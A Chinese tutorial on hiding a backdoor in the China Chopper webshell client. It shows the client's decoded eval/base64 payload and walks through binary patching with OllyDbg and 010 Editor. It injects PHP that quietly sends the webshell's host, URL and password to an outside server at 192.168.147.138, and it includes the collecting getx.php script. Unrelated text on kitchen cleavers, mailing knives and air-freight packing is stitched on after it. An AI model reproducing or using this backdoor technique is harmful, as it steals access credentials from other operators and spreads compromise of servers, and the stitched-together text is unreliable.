如何给中国菜刀添加隐蔽后门

这里要先讲下菜刀的后门是如何触发的，知道如何触发后门，后面按这个思路往下看会方便些。

当一句话连回目标服务器时，我们经常会在文件列表中右键查看文件，如下图

当我们执行右键-编辑文件时，我们的后门就会被触发（我们要添加的就是这样的一个隐藏后门）。

2、菜刀脱壳

在分析菜刀前，先把菜刀的壳脱掉，使用Peid可知，菜刀是UPx壳，网上找个Upx的脱壳工具即可脱壳。

3、查看数据包，分析流程（右键-编辑）

本地搭建好环境后，在菜刀中右键-编辑查看某一文件，使用burpsuite进行抓包，

数据如下

a=%40eval%01%28base64_decode%28%24_POST%5Bz0%5D%29%29%3B&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskRj1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JFA9QGZvcGVuKCRGLCJyIik7ZWNobyhAZnJlYWQoJFAsZmlsZXNpemUoJEYpKSk7QGZjbG9zZSgkUCk7O2VjaG8oInw8LSIpO2RpZSgpOw%3D%3D&z1=QzpcXHdhbXBcXHd3d1xccm9ib3RzLnR4dA%3D%3D

一共有3个参数，

a url解码后为@eval (base64_decode($_POST[z0]))

z0先url解码，在base64解码为

@ini_set("display_errors","0")@set_time_limit(0)@set_magic_quotes_runtime(0)echo("->|")$F=base64_decode($_POST["z1"])$P=@fopen($F,"r")echo(@fread($P,filesize($F)))@fclose($P)echo("|<-")die()

Z1先url解码，在base64解码为

C:\\wamp\\www\\robots.txt

稍微熟悉php的人应该能看出来，这段代码就是一个读文件的php脚本，由菜刀发送到目标服务器上，然后在目标服务器上执行的。 既然代码作为字符串发送带目标服务器上，那我我们可以再字符串上添加我们想执行的代码，由菜刀一起发送过去执行。

if(@$_COOKIE['f1']!=95){@setcookie('f1',95)@file_get_contents('http://192.168.147.138/getx.php?caidao='.$_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI].'_P='.key($_POST))}

如果我们将上这段代码作为字符串，发送到服务端执行，我们就能获得webshell的地址和密码。

4、使用OD分析

使用OD打开中国菜刀，右键搜索字符串，结果如下：

定位到php读取文的字符串处，点击进去到代码处

可知，程序时将其作为字符串，压入栈中作为参数被后续函数处理的，如果在这段字符串后加入我们的后门代码，就会被程序一块发送到服务端执行。

5、修改菜刀程序文件

由上可知，字符串的地址为0x49ba94,查看内存数据，

发现其后面已经被他字符串占用（直接查看原二进制文件结果也是如此），如果我们强制在后面添加后门字符串，就会破坏远程的某些内容。因此我们需要另外找一个空闲的大空间，将后门代码放在此处。

这里我们选取地址4841d0h的空间，转化为文件偏移即为841d0h。

将后门字符串

$F=base64_decode($_POST["z1"])$P=@fopen($F,"r")echo(@fread($P,filesize($F)))@fclose($P)if(@$_COOKIE['f1']!=95){@setcookie('f1',95)@file_get_contents('http://192.168.147.138/getx.php?caidao='.$_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI].'_P='.key($_POST))}

放到文件841d0处

打开010editor 将上述字符串复制到010editor中，

由于程序中的字符串是双字节存放的，这里我们需要将后门代码也转化为双字节的。010ditor-工具-转换

使用010editor打开菜刀程序，跳到841d0h偏移处，将转换后的字符串覆盖替换菜刀程序中相同大小的数据长度，

保存文件，这样后门字符串就被我们添加到程序中了。

6、使用OD修改程序代码

用OD打开菜刀程序，定位到第4步中字符串入栈的代码处 push 0049bae4。

0049bae4地址是修改前字符串的位置，现在我们将其改成我们添加的字符串的地质处，字符串文件偏移为841d0h，转化内存偏移为4841d0h,代码修改如下

保存修改的文件即可。

7、测试修改结果

修改文件后，我们在看看菜刀-右键编辑，抓到数据包

Z0解密后为

@ini_set("display_errors","0")@set_time_limit(0)@set_magic_quotes_runtime(0)echo("->|")$F=base64_decode($_POST["z1"])$P=@fopen($F,"r")echo(@fread($P,filesize($F)))@fclose($P)if(@$_COOKIE['f1']!=95){@setcookie('f1',95)@file_get_contents('http://192.168.147.138/getx.php?caidao='.$_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI].'_P='.key($_POST))}echo("|<-")die()

可见我们的后门代码也一起被发送到服务端执行了。

编写加单的getx.php接收结果，

getx.php:

<?php

$getx = $_GET["caidao"]

$file = fopen("getx.txt","a+")

fwrite($file,$getx)

fwrite($file,"\r\n")

fclose($file)

?>

结果如下：

8、后记

通过测试可知，对于asp，aspx跟php后门的添加相似，都可以实现。Jsp木马形式不一，实现添加后门较为困难。另外，由于后门是在服务端执行的，所以不容易被发现，本地抓包是检测不到后门的；OD中右键查看后门地址也是不能直接看到的。

菜刀含镍。菜刀的主要成分为铁元素，其中会添加碳、镍、铬改善其刚度和强度及耐腐蚀性（生锈）。

菜刀是一种厨房用具，主要用途是切食材或者食材雕花等。可分为不锈钢刀与铁刀，也可分为中式菜刀、日式菜刀和洋式菜刀。大多数菜刀在用的不锋利的时候都是需要刃磨的。磨菜刀的磨刀石在一般的五金店里都可以买到。磨刀石与菜刀的夹角一般是在5~15度左右，依照个人对菜刀刃夹角的需要而确定。

基本信息：

国产菜刀里，主要有不锈钢刀与碳钢刀：碳钢刀老百姓俗称“铁刀”，锋利度高，但是容易生锈，比较难打理。不锈钢刀是在碳钢刀的基础上，增加了防锈、防腐蚀性的铬、钼钒等元素，所以外观更加干净、美观，不易生锈，打理比较简单，高硬度钢材的锋利度，比如8铬、9铬、大马士等，甚至超过碳钢刀。

菜刀有非常多的种类，除了依据各种目的设计的菜刀之外，也可分为中式菜刀、日式菜刀和洋式菜刀。日式菜刀通常是搭配在砧板上使用，切断食材后砧板可防止刀刃受损。而洋式菜刀则是大部份可直接在调理台上使用。

顺丰和邮政这两个物流可以寄菜刀。

菜刀是可以邮寄的，一般像邮政还有顺丰快递，像酒烟，还有菜刀之类的，都是可以进行快递的。因为他们有了自己的专业供货渠道，有了专业的运输系统，像其他的快递，比如说像中通啊之类的是不可以的。

菜刀属于家庭厨房用刀具，是可以邮寄的。据邮政速递物流，普通菜刀不属于管制刀具，可以快递。但整套的菜刀里如果有剔骨刀，就不行，这个属于管制刀具。所以目前市民要寄整套的菜刀，快递公司业务员一般不会接受。

淘宝上一些卖家可以寄送厨房刀具，一般都与快递公司是合作关系，它们发货量大，一般快递公司可能与商家签订安全协议，说明寄送菜刀的目的、用途，对菜刀的包装也有较严厉的要求，以防运输过程中出现意外。

空运货物常用的包装方式：

空运柔软、抗压、干燥类物品的包装。柔软、抗压、干燥的物如服装鞋帽、被子、布质玩具及饰品等，由于这类物品不怕碰撞，可以使用硬纸箱包、布包或塑料袋包装。

如果体积较大，建议包装外部用绳子或胶带以“井”字型捆扎，如果是书籍、画册等物品，如果采用纸质或塑料包装，最好在捆扎前在货物的顶部和底部添加厚纸板或木板，避免因磕碰儿损坏。